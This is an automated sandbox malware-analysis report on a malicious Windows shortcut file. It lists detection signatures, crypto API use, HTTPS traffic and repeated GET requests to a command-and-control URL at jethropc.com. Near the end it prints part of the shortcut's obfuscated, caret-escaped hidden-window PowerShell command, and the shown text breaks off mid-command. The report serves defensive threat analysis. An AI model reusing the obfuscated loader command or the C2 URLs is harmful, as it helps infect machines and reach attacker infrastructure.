Windows Analysis Report
knfV5IVjEV.lnk

Overview

General Information

Sample name:	knfV5IVjEV.lnk (renamed file extension from none to lnk, renamed because original name is a hash value)
Original sample name:	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Analysis ID:	1430699
MD5:	9d6c79c0b395cceb83662aa3f7ed0123
SHA1:	65f5f7d127c478522e9669200de20000edcb6cfb
SHA256:	2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Deletes itself after installation

Found URL in windows shortcut file (LNK)

Machine Learning detection for sample

Obfuscated command line found

Powershell creates an autostart link

Suspicious powershell command line found

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Very long command line found

Windows shortcut file (LNK) contains suspicious command line arguments

Yara detected Obfuscated Powershell

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Copy From or To System Directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: knfV5IVjEV.lnk	ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk	Virustotal: Detection: 29%			Perma Link

Machine Learning detection for sample

Source: knfV5IVjEV.lnk

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDCB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,	8_2_00007FF7F1DDCB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	8_2_00007FF7F1DDF310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DDF4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE64F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	8_2_00007FF7F1DE64F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9C9C CryptHashData,	8_2_00007FF7F1DE9C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DE9C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9BD0 CryptAcquireContextA,CryptCreateHash,	8_2_00007FF7F1DE9BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	8_2_00007FF7F1DE934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE8F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	8_2_00007FF7F1DE8F14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE6560 CryptHashData,	8_2_00007FF7F1DE6560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE6570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DE6570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8CB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,	12_2_00007FF700E8CB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	12_2_00007FF700E8F310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99BD0 CryptAcquireContextA,CryptCreateHash,	12_2_00007FF700E99BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	12_2_00007FF700E9934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E964F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	12_2_00007FF700E964F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E8F4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99C9C CryptHashData,	12_2_00007FF700E99C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E99C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E96570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E96570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E96560 CryptHashData,	12_2_00007FF700E96560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E98F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	12_2_00007FF700E98F14

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: -----BEGIN PUBLIC KEY-----		8_2_00007FF7F1DBD6F4
Source: GSlLzFnTov.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source:	Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB20E0 malloc,recv,send,WSAGetLastError,

8_2_00007FF7F1DB20E0

Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /

Source: GSlLzFnTov.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe.1.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: unknown

DNS traffic detected: queries for: jethropc.com

Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1332486385.000002630F825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/P
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1332789256.0000026312AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=
Source: knfV5IVjEV.lnk	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481469904.000001C4E455D000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%
Source: GSlLzFnTov.exe, 00000008.00000003.1414842290.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com
Source: GSlLzFnTov.exe, 00000008.00000003.1414909781.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: GSlLzFnTov.exe, 00000009.00000002.1438709537.000002AD152F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e
Source: GSlLzFnTov.exe, 00000009.00000003.1435646730.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O
Source: GSlLzFnTov.exe, 00000009.00000003.1435462912.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y
Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: knfV5IVjEV.lnk, type: SAMPLE	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: amsi64_7732.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found URL in windows shortcut file (LNK)

Source: Initial file

Strings: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago

Very long command line found

Source: unknown	Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2948	Jump to behavior

Windows shortcut file (LNK) contains suspicious command line arguments

Source: knfV5IVjEV.lnk

LNK file: /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty 